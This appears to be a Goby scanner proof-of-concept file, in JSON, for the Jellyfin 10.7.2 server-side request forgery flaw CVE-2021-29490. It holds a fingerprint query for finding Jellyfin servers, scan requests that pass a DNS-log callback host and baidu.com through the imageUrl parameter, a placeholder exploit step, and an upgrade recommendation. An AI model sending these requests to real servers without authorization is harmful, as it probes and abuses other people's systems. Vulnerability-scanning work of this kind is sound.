mirror of https://github.com/qwqdanchun/Goby.git
137 lines
5.7 KiB
JSON
137 lines
5.7 KiB
JSON
{
|
|
"Name": "Jellyfin 10.7.2 SSRF CVE-2021-29490",
|
|
"Level": "1",
|
|
"Tags": [
|
|
"ssrf"
|
|
],
|
|
"GobyQuery": "title=\"Jellyfin\"",
|
|
"Description": "Jellyfin is the volunteer-built media solution that puts you in control of your media. Stream to any device from your own server, with no strings attached.",
|
|
"Product": "Jellyfin",
|
|
"Homepage": "https://jellyfin.org/",
|
|
"Author": "",
|
|
"Impact": "Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
|
|
"Recommendation": "Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints \"/Items/*/RemoteImages/Download\", \"/Items/RemoteSearch/Image\" and \"/Images/Remote\".Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
|
|
"References": [
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2021-29490",
|
|
"https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96",
|
|
"https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485439&idx=3&sn=4bd6fc982541ca3ec610856c37a36c14"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"OR",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/Images/Remote?imageUrl=http://{{{check}}}",
|
|
"follow_redirect": false,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": [
|
|
"check|dnslog|4|15"
|
|
]
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$dns",
|
|
"operation": "contains",
|
|
"value": "{{{check}}}",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
},
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/Images/Remote?imageUrl=http://www.baidu.com",
|
|
"follow_redirect": false,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "百度",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/test.php",
|
|
"follow_redirect": true,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "test",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "0000-00-00 00:00:00",
|
|
"GobyVersion": "0.0.0"
|
|
} |